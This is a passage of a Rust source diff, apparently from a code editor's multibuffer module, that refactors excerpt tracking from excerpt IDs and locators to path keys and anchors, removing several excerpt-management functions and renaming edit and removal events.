_) => true, - (Some(prev), next) => prev.buffer_id != next.buffer_id, + (Some(prev), next) => prev.buffer_id() != next.buffer_id(), } } } @@ -730,7 +811,7 @@ impl ExcerptBoundary { #[derive(Copy, Clone, Debug, PartialEq, Eq)] pub struct ExpandInfo { pub direction: ExpandExcerptDirection, - pub excerpt_id: ExcerptId, + pub start_anchor: Anchor, } #[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] @@ -744,45 +825,20 @@ pub struct RowInfo { } /// A slice into a [`Buffer`] that is being edited in a [`MultiBuffer`]. -#[derive(Clone)] -struct Excerpt { - /// The unique identifier for this excerpt - id: ExcerptId, +#[derive(Clone, Debug)] +pub(crate) struct Excerpt { /// The location of the excerpt in the [`MultiBuffer`] - locator: Locator, - /// The buffer being excerpted - buffer_id: BufferId, - /// A snapshot of the buffer being excerpted - buffer: Arc, + pub(crate) path_key: PathKey, + pub(crate) path_key_index: PathKeyIndex, + pub(crate) buffer_id: BufferId, /// The range of the buffer to be shown in the excerpt - range: ExcerptRange, + pub(crate) range: ExcerptRange, + /// The last row in the excerpted slice of the buffer - max_buffer_row: BufferRow, + pub(crate) max_buffer_row: BufferRow, /// A summary of the text in the excerpt - text_summary: TextSummary, - has_trailing_newline: bool, -} - -/// A public view into an `Excerpt` in a [`MultiBuffer`]. -/// -/// Contains methods for getting the [`Buffer`] of the excerpt, -/// as well as mapping offsets to/from buffer and multibuffer coordinates. -#[derive(Clone)] -pub struct MultiBufferExcerpt<'a> { - excerpt: &'a Excerpt, - diff_transforms: - sum_tree::Cursor<'a, 'static, DiffTransform, DiffTransforms>, - /// The offset in the multibuffer considering diff transforms. - offset: MultiBufferOffset, - /// The offset in the multibuffer without diff transforms. - excerpt_offset: ExcerptOffset, - buffer_offset: BufferOffset, -} - -#[derive(Clone, Debug)] -struct ExcerptIdMapping { - id: ExcerptId, - locator: Locator, + pub(crate) text_summary: TextSummary, + pub(crate) has_trailing_newline: bool, } /// A range of text from a single [`Buffer`], to be shown as an `Excerpt`. @@ -805,16 +861,37 @@ impl ExcerptRange { } } -#[derive(Clone, Debug, Default)] +impl ExcerptRange { + pub fn contains(&self, t: &text::Anchor, snapshot: &BufferSnapshot) -> bool { + self.context.start.cmp(t, snapshot).is_le() && self.context.end.cmp(t, snapshot).is_ge() + } +} + +#[derive(Clone, Debug)] pub struct ExcerptSummary { - excerpt_id: ExcerptId, - /// The location of the last [`Excerpt`] being summarized - excerpt_locator: Locator, + path_key: PathKey, + max_anchor: Option, widest_line_number: u32, text: MBTextSummary, count: usize, } +impl ExcerptSummary { + pub fn min() -> Self { + ExcerptSummary { + path_key: PathKey::min(), + max_anchor: None, + widest_line_number: 0, + text: MBTextSummary::default(), + count: 0, + } + } + + fn len(&self) -> ExcerptOffset { + ExcerptDimension(self.text.len) + } +} + #[derive(Debug, Clone)] pub struct DiffTransformSummary { input: MBTextSummary, @@ -990,13 +1067,13 @@ pub struct MultiBufferChunks<'a> { excerpts: Cursor<'a, 'static, Excerpt, ExcerptOffset>, diff_transforms: Cursor<'a, 'static, DiffTransform, Dimensions>, - diffs: &'a TreeMap, diff_base_chunks: Option<(BufferId, BufferChunks<'a>)>, buffer_chunk: Option>, range: Range, excerpt_offset_range: Range, excerpt_chunks: Option>, language_aware: bool, + snapshot: &'a MultiBufferSnapshot, } pub struct ReversedMultiBufferChunks<'a> { @@ -1050,8 +1127,8 @@ impl<'a, MBD: MultiBufferDimension> Dimension<'a, DiffTransformSummary> for Diff struct MultiBufferCursor<'a, MBD, BD> { excerpts: Cursor<'a, 'static, Excerpt, ExcerptDimension>, diff_transforms: Cursor<'a, 'static, DiffTransform, DiffTransforms>, - diffs: &'a TreeMap, cached_region: OnceCell>>, + snapshot: &'a MultiBufferSnapshot, } #[derive(Clone)] @@ -1066,8 +1143,8 @@ struct MultiBufferRegion<'a, MBD, BD> { } struct ExcerptChunks<'a> { - excerpt_id: ExcerptId, content_chunks: BufferChunks<'a>, + end: ExcerptAnchor, has_footer: bool, } @@ -1077,7 +1154,6 @@ struct BufferEdit { new_text: Arc, is_insertion: bool, original_indent_column: Option, - excerpt_id: ExcerptId, } #[derive(Clone, Copy, Debug, PartialEq)] @@ -1180,8 +1256,6 @@ impl MultiBuffer { singleton: false, capability, title: None, - excerpts_by_path: Default::default(), - paths_by_excerpt: Default::default(), buffer_changed_since_sync: Default::default(), history: History::default(), } @@ -1198,11 +1272,6 @@ impl MultiBuffer { *buffer_id, BufferState { buffer: buffer_state.buffer.clone(), - last_version: buffer_state.last_version.clone(), - last_non_text_state_update_count: buffer_state - .last_non_text_state_update_count - .clone(), - excerpts: buffer_state.excerpts.clone(), _subscriptions: [ new_cx.observe(&buffer_state.buffer, |_, _, cx| cx.notify()), new_cx.subscribe(&buffer_state.buffer, Self::on_buffer_event), @@ -1217,8 +1286,6 @@ impl MultiBuffer { Self { snapshot: RefCell::new(self.snapshot.borrow().clone()), buffers, - excerpts_by_path: Default::default(), - paths_by_excerpt: Default::default(), diffs: diff_bases, subscriptions: Default::default(), singleton: self.singleton, @@ -1229,8 +1296,15 @@ impl MultiBuffer { } } - pub fn set_group_interval(&mut self, group_interval: Duration) { + pub fn set_group_interval(&mut self, group_interval: Duration, cx: &mut Context) { self.history.set_group_interval(group_interval); + if self.singleton { + for BufferState { buffer, .. } in self.buffers.values() { + buffer.update(cx, |buffer, _| { + buffer.set_group_interval(group_interval); + }); + } + } } pub fn with_title(mut self, title: String) -> Self { @@ -1366,7 +1440,7 @@ impl MultiBuffer { _ => Default::default(), }; - let (buffer_edits, edited_excerpt_ids) = MultiBuffer::convert_edits_to_buffer_edits( + let buffer_edits = MultiBuffer::convert_edits_to_buffer_edits( edits, this.snapshot.get_mut(), &original_indent_columns, @@ -1387,14 +1461,12 @@ impl MultiBuffer { mut new_text, mut is_insertion, original_indent_column, - excerpt_id, }) = edits.next() { while let Some(BufferEdit { range: next_range, is_insertion: next_is_insertion, new_text: next_new_text, - excerpt_id: next_excerpt_id, .. }) = edits.peek() { @@ -1407,9 +1479,7 @@ impl MultiBuffer { if should_coalesce { range.end = cmp::max(next_range.end, range.end); is_insertion |= *next_is_insertion; - if excerpt_id == *next_excerpt_id { - new_text = format!("{new_text}{next_new_text}").into(); - } + new_text = format!("{new_text}{next_new_text}").into(); edits.next(); } else { break; @@ -1457,10 +1527,7 @@ impl MultiBuffer { }) } - cx.emit(Event::ExcerptsEdited { - excerpt_ids: edited_excerpt_ids, - buffer_ids, - }); + cx.emit(Event::BuffersEdited { buffer_ids }); } } @@ -1468,9 +1535,8 @@ impl MultiBuffer { edits: Vec<(Range, Arc)>, snapshot: &MultiBufferSnapshot, original_indent_columns: &[Option], - ) -> (HashMap>, Vec) { + ) -> HashMap> { let mut buffer_edits: HashMap> = Default::default(); - let mut edited_excerpt_ids = Vec::new(); let mut cursor = snapshot.cursor::(); for (ix, (range, new_text)) in edits.into_iter().enumerate() { let original_indent_column = original_indent_columns.get(ix).copied().flatten(); @@ -1515,11 +1581,10 @@ impl MultiBuffer { let buffer_end = (end_region.buffer_range.start + end_overshoot).min(end_region.buffer_range.end); - if start_region.excerpt.id == end_region.excerpt.id { + if start_region.excerpt == end_region.excerpt { if start_region.buffer.capability == Capability::ReadWrite && start_region.is_main_buffer { - edited_excerpt_ids.push(start_region.excerpt.id); buffer_edits .entry(start_region.buffer.remote_id()) .or_default() @@ -1528,7 +1593,6 @@ impl MultiBuffer { new_text, is_insertion: true, original_indent_column, - excerpt_id: start_region.excerpt.id, }); } } else { @@ -1537,7 +1601,6 @@ impl MultiBuffer { if start_region.buffer.capability == Capability::ReadWrite && start_region.is_main_buffer { - edited_excerpt_ids.push(start_region.excerpt.id); buffer_edits .entry(start_region.buffer.remote_id()) .or_default() @@ -1546,14 +1609,11 @@ impl MultiBuffer { new_text: new_text.clone(), is_insertion: true, original_indent_column, - excerpt_id: start_region.excerpt.id, }); } - let excerpt_id = end_region.excerpt.id; if end_region.buffer.capability == Capability::ReadWrite && end_region.is_main_buffer { - edited_excerpt_ids.push(excerpt_id); buffer_edits .entry(end_region.buffer.remote_id()) .or_default() @@ -1562,18 +1622,17 @@ impl MultiBuffer { new_text: new_text.clone(), is_insertion: false, original_indent_column, - excerpt_id, }); } + let end_region_excerpt = end_region.excerpt.clone(); cursor.seek(&range.start); cursor.next_excerpt(); while let Some(region) = cursor.region() { - if region.excerpt.id == excerpt_id { + if region.excerpt == &end_region_excerpt { break; } if region.buffer.capability == Capability::ReadWrite && region.is_main_buffer { - edited_excerpt_ids.push(region.excerpt.id); buffer_edits .entry(region.buffer.remote_id()) .or_default() @@ -1582,14 +1641,13 @@ impl MultiBuffer { new_text: new_text.clone(), is_insertion: false, original_indent_column, - excerpt_id: region.excerpt.id, }); } cursor.next_excerpt(); } } } - (buffer_edits, edited_excerpt_ids) + buffer_edits } pub fn autoindent_ranges(&mut self, ranges: I, cx: &mut Context) @@ -1621,7 +1679,7 @@ impl MultiBuffer { edits: Vec<(Range, Arc)>, cx: &mut Context, ) { - let (buffer_edits, edited_excerpt_ids) = + let buffer_edits = MultiBuffer::convert_edits_to_buffer_edits(edits, this.snapshot.get_mut(), &[]); let mut buffer_ids = Vec::new(); @@ -1645,10 +1703,7 @@ impl MultiBuffer { }) } - cx.emit(Event::ExcerptsEdited { - excerpt_ids: edited_excerpt_ids, - buffer_ids, - }); + cx.emit(Event::BuffersEdited { buffer_ids }); } } @@ -1659,38 +1714,25 @@ impl MultiBuffer { cursor_shape: CursorShape, cx: &mut Context, ) { + let snapshot = self.snapshot(cx); let mut selections_by_buffer: HashMap>> = Default::default(); - let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::>(()); - for selection in selections { - let start_locator = snapshot.excerpt_locator_for_id(selection.start.excerpt_id); - let end_locator = snapshot.excerpt_locator_for_id(selection.end.excerpt_id); - cursor.seek(&Some(start_locator), Bias::Left); - while let Some(excerpt) = cursor.item() - && excerpt.locator <= *end_locator + for selection in selections { + for (buffer_snapshot, buffer_range, _) in + snapshot.range_to_buffer_ranges(selection.start..selection.end) { - let mut start = excerpt.range.context.start; - let mut end = excerpt.range.context.end; - if excerpt.id == selection.start.excerpt_id { - start = selection.start.text_anchor; - } - if excerpt.id == selection.end.excerpt_id { - end = selection.end.text_anchor; - } selections_by_buffer - .entry(excerpt.buffer_id) + .entry(buffer_snapshot.remote_id()) .or_default() .push(Selection { id: selection.id, - start, - end, + start: buffer_snapshot + .anchor_at(buffer_range.start, selection.start.bias()), + end: buffer_snapshot.anchor_at(buffer_range.end, selection.end.bias()), reversed: selection.reversed, goal: selection.goal, }); - - cursor.next(); } } @@ -1702,25 +1744,9 @@ impl MultiBuffer { } } - for (buffer_id, mut selections) in selections_by_buffer { + for (buffer_id, selections) in selections_by_buffer { self.buffers[&buffer_id].buffer.update(cx, |buffer, cx| { - selections.sort_unstable_by(|a, b| a.start.cmp(&b.start, buffer)); - let mut selections = selections.into_iter().peekable(); - let merged_selections = Arc::from_iter(iter::from_fn(|| { - let mut selection = selections.next()?; - while let Some(next_selection) = selections.peek() { - if selection.end.cmp(&next_selection.start, buffer).is_ge() { - let next_selection = selections.next().unwrap(); - if next_selection.end.cmp(&selection.end, buffer).is_ge() { - selection.end = next_selection.end; - } - } else { - break; - } - } - Some(selection) - })); - buffer.set_active_selections(merged_selections, line_mode, cursor_shape, cx); + buffer.set_active_selections(selections.into(), line_mode, cursor_shape, cx); }); } } @@ -1736,199 +1762,31 @@ impl MultiBuffer { #[instrument(skip_all)] fn merge_excerpt_ranges<'a>( expanded_ranges: impl IntoIterator> + 'a, - ) -> (Vec>, Vec) { + ) -> Vec> { + let mut sorted: Vec<_> = expanded_ranges.into_iter().collect(); + sorted.sort_by_key(|range| range.context.start); let mut merged_ranges: Vec> = Vec::new(); - let mut counts: Vec = Vec::new(); - for range in expanded_ranges { + for range in sorted { if let Some(last_range) = merged_ranges.last_mut() { - assert!( - last_range.context.start <= range.context.start, - "ranges must be sorted: {last_range:?} <= {range:?}" - ); if last_range.context.end >= range.context.start || last_range.context.end.row + 1 == range.context.start.row { last_range.context.end = range.context.end.max(last_range.context.end); - *counts.last_mut().unwrap() += 1; continue; } } merged_ranges.push(range.clone()); - counts.push(1); - } - (merged_ranges, counts) - } - - pub fn insert_excerpts_after( - &mut self, - prev_excerpt_id: ExcerptId, - buffer: Entity, - ranges: impl IntoIterator>, - cx: &mut Context, - ) -> Vec - where - O: text::ToOffset, - { - let mut ids = Vec::new(); - let mut next_excerpt_id = - if let Some(last_entry) = self.snapshot.borrow().excerpt_ids.last() { - last_entry.id.0 + 1 - } else { - 1 - }; - self.insert_excerpts_with_ids_after( - prev_excerpt_id, - buffer, - ranges.into_iter().map(|range| { - let id = ExcerptId(post_inc(&mut next_excerpt_id)); - ids.push(id); - (id, range) - }), - cx, - ); - ids - } - - pub fn insert_excerpts_with_ids_after( - &mut self, - prev_excerpt_id: ExcerptId, - buffer: Entity, - ranges: impl IntoIterator)>, - cx: &mut Context, - ) where - O: text::ToOffset, - { - assert_eq!(self.history.transaction_depth(), 0); - let mut ranges = ranges.into_iter().peekable(); - if ranges.peek().is_none() { - return Default::default(); - } - - self.sync_mut(cx); - - let buffer_snapshot = buffer.read(cx).snapshot(); - let buffer_id = buffer_snapshot.remote_id(); - - let buffer_state = self.buffers.entry(buffer_id).or_insert_with(|| { - self.buffer_changed_since_sync.replace(true); - buffer.update(cx, |buffer, _| { - buffer.record_changes(Rc::downgrade(&self.buffer_changed_since_sync)); - }); - BufferState { - last_version: RefCell::new(buffer_snapshot.version().clone()), - last_non_text_state_update_count: Cell::new( - buffer_snapshot.non_text_state_update_count(), - ), - excerpts: Default::default(), - _subscriptions: [ - cx.observe(&buffer, |_, _, cx| cx.notify()), - cx.subscribe(&buffer, Self::on_buffer_event), - ], - buffer: buffer.clone(), - } - }); - - let mut snapshot = self.snapshot.get_mut(); - - let mut prev_locator = snapshot.excerpt_locator_for_id(prev_excerpt_id).clone(); - let mut new_excerpt_ids = mem::take(&mut snapshot.excerpt_ids); - let mut cursor = snapshot.excerpts.cursor::>(()); - let mut new_excerpts = cursor.slice(&prev_locator, Bias::Right); - prev_locator = cursor.start().unwrap_or(Locator::min_ref()).clone(); - - let edit_start = ExcerptDimension(new_excerpts.summary().text.len); - new_excerpts.update_last( - |excerpt| { - excerpt.has_trailing_newline = true; - }, - (), - ); - - let next_locator = if let Some(excerpt) = cursor.item() { - excerpt.locator.clone() - } else { - Locator::max() - }; - - let mut excerpts = Vec::new(); - let buffer_snapshot = Arc::new(buffer_snapshot); - while let Some((id, range)) = ranges.next() { - let locator = Locator::between(&prev_locator, &next_locator); - if let Err(ix) = buffer_state.excerpts.binary_search(&locator) { - buffer_state.excerpts.insert(ix, locator.clone()); - } - let range = ExcerptRange { - context: buffer_snapshot.anchor_before(&range.context.start) - ..buffer_snapshot.anchor_after(&range.context.end), - primary: buffer_snapshot.anchor_before(&range.primary.start) - ..buffer_snapshot.anchor_after(&range.primary.end), - }; - excerpts.push((id, range.clone())); - let excerpt = Excerpt::new( - id, - locator.clone(), - buffer_id, - buffer_snapshot.clone(), - range, - ranges.peek().is_some() || cursor.item().is_some(), - ); - new_excerpts.push(excerpt, ()); - prev_locator = locator.clone(); - - if let Some(last_mapping_entry) = new_excerpt_ids.last() { - assert!(id > last_mapping_entry.id, "excerpt ids must be increasing"); - } - new_excerpt_ids.push(ExcerptIdMapping { id, locator }, ()); - } - snapshot - .buffer_locators - .insert(buffer_id, buffer_state.excerpts.iter().cloned().collect()); - - let edit_end = ExcerptDimension(new_excerpts.summary().text.len); - - let suffix = cursor.suffix(); - let changed_trailing_excerpt = suffix.is_empty(); - new_excerpts.append(suffix, ()); - drop(cursor); - snapshot.excerpts = new_excerpts; - snapshot.excerpt_ids = new_excerpt_ids; - if changed_trailing_excerpt { - snapshot.trailing_excerpt_update_count += 1; - } - - let edits = Self::sync_diff_transforms( - &mut snapshot, - vec![Edit { - old: edit_start..edit_start, - new: edit_start..edit_end, - }], - DiffChangeKind::BufferEdited, - ); - if !edits.is_empty() { - self.subscriptions.publish(edits); } - - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsAdded { - buffer, - predecessor: prev_excerpt_id, - excerpts, - }); - cx.notify(); + merged_ranges } pub fn clear(&mut self, cx: &mut Context) { self.sync_mut(cx); - let ids = self.excerpt_ids(); let removed_buffer_ids = std::mem::take(&mut self.buffers).into_keys().collect(); - self.excerpts_by_path.clear(); - self.paths_by_excerpt.clear(); + self.diffs.clear(); let MultiBufferSnapshot { excerpts, - buffer_locators, - diffs: _, + diffs, diff_transforms: _, non_text_state_update_count: _, edit_count: _, @@ -1937,27 +1795,25 @@ impl MultiBuffer { has_conflict, has_inverted_diff, singleton: _, - excerpt_ids: _, - replaced_excerpts, trailing_excerpt_update_count, all_diff_hunks_expanded: _, show_deleted_hunks: _, use_extended_diff_range: _, show_headers: _, + path_keys_by_index: _, + indices_by_path_key: _, + buffers, } = self.snapshot.get_mut(); - buffer_locators.clear(); let start = ExcerptDimension(MultiBufferOffset::ZERO); let prev_len = ExcerptDimension(excerpts.summary().text.len); *excerpts = Default::default(); + *buffers = Default::default(); + *diffs = Default::default(); *trailing_excerpt_update_count += 1; *is_dirty = false; *has_deleted_file = false; *has_conflict = false; *has_inverted_diff = false; - match Arc::get_mut(replaced_excerpts) { - Some(replaced_excerpts) => replaced_excerpts.clear(), - None => *replaced_excerpts = Default::default(), - } let edits = Self::sync_diff_transforms( self.snapshot.get_mut(), @@ -1972,121 +1828,12 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); - cx.emit(Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - }); + cx.emit(Event::BuffersRemoved { removed_buffer_ids }); cx.notify(); } - #[ztracing::instrument(skip_all)] - pub fn excerpts_for_buffer( - &self, - buffer_id: BufferId, - cx: &App, - ) -> Vec<(ExcerptId, ExcerptRange)> { - let mut excerpts = Vec::new(); - let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::>(()); - if let Some(locators) = snapshot.buffer_locators.get(&buffer_id) { - for locator in &**locators { - cursor.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *locator - { - excerpts.push((excerpt.id, excerpt.range.clone())); - } - } - } - - excerpts - } - - pub fn excerpt_ranges_for_buffer(&self, buffer_id: BufferId, cx: &App) -> Vec> { - let snapshot = self.read(cx); - let mut excerpts = snapshot - .excerpts - .cursor::, ExcerptPoint>>(()); - let mut diff_transforms = snapshot - .diff_transforms - .cursor::>>(()); - diff_transforms.next(); - let locators = snapshot - .buffer_locators - .get(&buffer_id) - .into_iter() - .flat_map(|v| &**v); - let mut result = Vec::new(); - for locator in locators { - excerpts.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = excerpts.item() - && excerpt.locator == *locator - { - let excerpt_start = excerpts.start().1; - let excerpt_end = excerpt_start + excerpt.text_summary.lines; - - diff_transforms.seek_forward(&excerpt_start, Bias::Left); - let overshoot = excerpt_start - diff_transforms.start().0; - let start = diff_transforms.start().1 + overshoot; - - diff_transforms.seek_forward(&excerpt_end, Bias::Right); - let overshoot = excerpt_end - diff_transforms.start().0; - let end = diff_transforms.start().1 + overshoot; - - result.push(start.0..end.0) - } - } - result - } - - pub fn excerpt_buffer_ids(&self) -> Vec { - self.snapshot - .borrow() - .excerpts - .iter() - .map(|entry| entry.buffer_id) - .collect() - } - - pub fn excerpt_ids(&self) -> Vec { - let snapshot = self.snapshot.borrow(); - let mut ids = Vec::with_capacity(snapshot.excerpts.summary().count); - ids.extend(snapshot.excerpts.iter().map(|entry| entry.id)); - ids - } - - pub fn excerpt_containing( - &self, - position: impl ToOffset, - cx: &App, - ) -> Option<(ExcerptId, Entity, Range)> { - let snapshot = self.read(cx); - let offset = position.to_offset(&snapshot); - - let mut cursor = snapshot.cursor::(); - cursor.seek(&offset); - cursor - .excerpt() - .or_else(|| snapshot.excerpts.last()) - .map(|excerpt| { - ( - excerpt.id, - self.buffers.get(&excerpt.buffer_id).unwrap().buffer.clone(), - excerpt.range.context.clone(), - ) - }) - } - - pub fn buffer_for_anchor(&self, anchor: Anchor, cx: &App) -> Option> { - if let Some(buffer_id) = anchor.text_anchor.buffer_id { - self.buffer(buffer_id) - } else { - let (_, buffer, _) = self.excerpt_containing(anchor, cx)?; - Some(buffer) - } - } - // If point is at the end of the buffer, the last excerpt is returned pub fn point_to_buffer_offset( &self, @@ -2106,15 +1853,10 @@ impl MultiBuffer { &self, point: T, cx: &App, - ) -> Option<(Entity, Point, ExcerptId)> { + ) -> Option<(Entity, Point)> { let snapshot = self.read(cx); - let (buffer, point, is_main_buffer) = - snapshot.point_to_buffer_point(point.to_point(&snapshot))?; - Some(( - self.buffers.get(&buffer.remote_id())?.buffer.clone(), - point, - is_main_buffer, - )) + let (buffer, point) = snapshot.point_to_buffer_point(point.to_point(&snapshot))?; + Some((self.buffers.get(&buffer.remote_id())?.buffer.clone(), point)) } pub fn buffer_point_to_anchor( @@ -2125,218 +1867,35 @@ impl MultiBuffer { cx: &App, ) -> Option { let mut found = None; - let snapshot = buffer.read(cx).snapshot(); - for (excerpt_id, range) in self.excerpts_for_buffer(snapshot.remote_id(), cx) { - let start = range.context.start.to_point(&snapshot); - let end = range.context.end.to_point(&snapshot); - if start <= point && point < end { - found = Some((snapshot.clip_point(point, Bias::Left), excerpt_id)); + let buffer_snapshot = buffer.read(cx).snapshot(); + let text_anchor = buffer_snapshot.anchor_after(&point); + let snapshot = self.snapshot(cx); + let path_key_index = snapshot.path_key_index_for_buffer(buffer_snapshot.remote_id())?; + for excerpt in snapshot.excerpts_for_buffer(buffer_snapshot.remote_id()) { + if excerpt + .context + .start + .cmp(&text_anchor, &buffer_snapshot) + .is_gt() + { + found = Some(Anchor::in_buffer(path_key_index, excerpt.context.start)); + break; + } else if excerpt + .context + .end + .cmp(&text_anchor, &buffer_snapshot) + .is_ge() + { + found = Some(Anchor::in_buffer(path_key_index, text_anchor)); break; } - if point < start { - found = Some((start, excerpt_id)); - } - if point > end { - found = Some((end, excerpt_id)); - } + found = Some(Anchor::in_buffer(path_key_index, excerpt.context.end)); } - found.map(|(point, excerpt_id)| { - let text_anchor = snapshot.anchor_after(point); - Anchor::in_buffer(excerpt_id, text_anchor) - }) + found } - pub fn buffer_anchor_to_anchor( - &self, - // todo(lw): We shouldn't need this? - buffer: &Entity, - anchor: text::Anchor, - cx: &App, - ) -> Option { - let snapshot = buffer.read(cx).snapshot(); - for (excerpt_id, range) in self.excerpts_for_buffer(snapshot.remote_id(), cx) { - if range.context.start.cmp(&anchor, &snapshot).is_le() - && range.context.end.cmp(&anchor, &snapshot).is_ge() - { - return Some(Anchor::in_buffer(excerpt_id, anchor)); - } - } - - None - } - - pub fn merge_excerpts( - &mut self, - excerpt_ids: &[ExcerptId], - cx: &mut Context, - ) -> ExcerptId { - debug_assert!(!excerpt_ids.is_empty()); - if excerpt_ids.len() == 1 { - return excerpt_ids[0]; - } - - let snapshot = self.snapshot(cx); - - let first_range = snapshot - .context_range_for_excerpt(excerpt_ids[0]) - .expect("first excerpt must exist"); - let last_range = snapshot - .context_range_for_excerpt(*excerpt_ids.last().unwrap()) - .expect("last excerpt must exist"); - - let union_range = first_range.start..last_range.end; - - drop(snapshot); - - self.resize_excerpt(excerpt_ids[0], union_range, cx); - let removed = &excerpt_ids[1..]; - for &excerpt_id in removed { - if let Some(path) = self.paths_by_excerpt.get(&excerpt_id) { - if let Some(excerpt_list) = self.excerpts_by_path.get_mut(path) { - excerpt_list.retain(|id| *id != excerpt_id); - if excerpt_list.is_empty() { - let path = path.clone(); - self.excerpts_by_path.remove(&path); - } - } - } - } - self.remove_excerpts(removed.iter().copied(), cx); - - excerpt_ids[0] - } - - pub fn remove_excerpts( - &mut self, - excerpt_ids: impl IntoIterator, - cx: &mut Context, - ) { - self.sync_mut(cx); - let ids = excerpt_ids.into_iter().collect::>(); - if ids.is_empty() { - return; - } - self.buffer_changed_since_sync.replace(true); - - let mut snapshot = self.snapshot.get_mut(); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::new(); - let mut excerpt_ids = ids.iter().copied().peekable(); - let mut removed_buffer_ids = Vec::new(); - let mut removed_excerpts_for_buffers = HashSet::default(); - - while let Some(excerpt_id) = excerpt_ids.next() { - self.paths_by_excerpt.remove(&excerpt_id); - // Seek to the next excerpt to remove, preserving any preceding excerpts. - let locator = snapshot.excerpt_locator_for_id(excerpt_id); - new_excerpts.append(cursor.slice(&Some(locator), Bias::Left), ()); - - if let Some(mut excerpt) = cursor.item() { - if excerpt.id != excerpt_id { - continue; - } - let mut old_start = cursor.start().1; - - // Skip over the removed excerpt. - 'remove_excerpts: loop { - if let Some(buffer_state) = self.buffers.get_mut(&excerpt.buffer_id) { - removed_excerpts_for_buffers.insert(excerpt.buffer_id); - buffer_state.excerpts.retain(|l| l != &excerpt.locator); - if buffer_state.excerpts.is_empty() { - log::debug!( - "removing buffer and diff for buffer {}", - excerpt.buffer_id - ); - self.buffers.remove(&excerpt.buffer_id); - removed_buffer_ids.push(excerpt.buffer_id); - } - } - cursor.next(); - - // Skip over any subsequent excerpts that are also removed. - if let Some(&next_excerpt_id) = excerpt_ids.peek() { - let next_locator = snapshot.excerpt_locator_for_id(next_excerpt_id); - if let Some(next_excerpt) = cursor.item() - && next_excerpt.locator == *next_locator - { - excerpt_ids.next(); - excerpt = next_excerpt; - continue 'remove_excerpts; - } - } - - break; - } - - // When removing the last excerpt, remove the trailing newline from - // the previous excerpt. - if cursor.item().is_none() && old_start > MultiBufferOffset::ZERO { - old_start -= 1; - new_excerpts.update_last(|e| e.has_trailing_newline = false, ()); - } - - // Push an edit for the removal of this run of excerpts. - let old_end = cursor.start().1; - let new_start = ExcerptDimension(new_excerpts.summary().text.len); - edits.push(Edit { - old: old_start..old_end, - new: new_start..new_start, - }); - } - } - let suffix = cursor.suffix(); - let changed_trailing_excerpt = suffix.is_empty(); - new_excerpts.append(suffix, ()); - drop(cursor); - for buffer_id in removed_excerpts_for_buffers { - match self.buffers.get(&buffer_id) { - Some(buffer_state) => { - snapshot - .buffer_locators - .insert(buffer_id, buffer_state.excerpts.iter().cloned().collect()); - } - None => { - snapshot.buffer_locators.remove(&buffer_id); - } - } - } - snapshot.excerpts = new_excerpts; - for buffer_id in &removed_buffer_ids { - self.diffs.remove(buffer_id); - snapshot.diffs.remove(buffer_id); - } - - // Recalculate has_inverted_diff after removing diffs - if !removed_buffer_ids.is_empty() { - snapshot.has_inverted_diff = snapshot - .diffs - .iter() - .any(|(_, diff)| diff.main_buffer.is_some()); - } - - if changed_trailing_excerpt { - snapshot.trailing_excerpt_update_count += 1; - } - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - }); - cx.notify(); - } - - pub fn wait_for_anchors<'a, Anchors: 'a + Iterator>( + pub fn wait_for_anchors<'a, Anchors: 'a + Iterator>( &self, anchors: Anchors, cx: &mut Context, @@ -2344,14 +1903,15 @@ impl MultiBuffer { let mut error = None; let mut futures = Vec::new(); for anchor in anchors { - if let Some(buffer_id) = anchor.text_anchor.buffer_id { - if let Some(buffer) = self.buffers.get(&buffer_id) { + if let Some(excerpt_anchor) = anchor.excerpt_anchor() { + if let Some(buffer) = self.buffers.get(&excerpt_anchor.text_anchor.buffer_id) { buffer.buffer.update(cx, |buffer, _| { - futures.push(buffer.wait_for_anchors([anchor.text_anchor])) + futures.push(buffer.wait_for_anchors([excerpt_anchor.text_anchor()])) }); } else { error = Some(anyhow!( - "buffer {buffer_id} is not part of this multi-buffer" + "buffer {:?} is not part of this multi-buffer", + excerpt_anchor.text_anchor.buffer_id )); break; } @@ -2372,15 +1932,15 @@ impl MultiBuffer { &self, position: T, cx: &App, - ) -> Option<(Entity, language::Anchor)> { + ) -> Option<(Entity, text::Anchor)> { let snapshot = self.read(cx); - let anchor = snapshot.anchor_before(position); + let anchor = snapshot.anchor_before(position).excerpt_anchor()?; let buffer = self .buffers - .get(&anchor.text_anchor.buffer_id?)? + .get(&anchor.text_anchor.buffer_id)? .buffer .clone(); - Some((buffer, anchor.text_anchor)) + Some((buffer, anchor.text_anchor())) } fn on_buffer_event( @@ -2392,8 +1952,9 @@ impl MultiBuffer { use language::BufferEvent; let buffer_id = buffer.read(cx).remote_id(); cx.emit(match event { - BufferEvent::Edited => Event::Edited { + &BufferEvent::Edited { is_local } => Event::Edited { edited_buffer: Some(buffer), + is_local, }, BufferEvent::DirtyChanged => Event::DirtyChanged, BufferEvent::Saved => Event::Saved, @@ -2416,10 +1977,11 @@ impl MultiBuffer { let diff = diff.read(cx); let buffer_id = diff.buffer_id; let diff = DiffStateSnapshot { + buffer_id, diff: diff.snapshot(cx), main_buffer: None, }; - self.snapshot.get_mut().diffs.insert(buffer_id, diff); + self.snapshot.get_mut().diffs.insert_or_replace(diff, ()); } fn inverted_buffer_diff_language_changed( @@ -2432,13 +1994,11 @@ impl MultiBuffer { let main_buffer_snapshot = main_buffer.read(cx).snapshot(); let diff = diff.read(cx); let diff = DiffStateSnapshot { + buffer_id: base_text_buffer_id, diff: diff.snapshot(cx), main_buffer: Some(main_buffer_snapshot), }; - self.snapshot - .get_mut() - .diffs - .insert(base_text_buffer_id, diff); + self.snapshot.get_mut().diffs.insert_or_replace(diff, ()); } fn buffer_diff_changed( @@ -2447,31 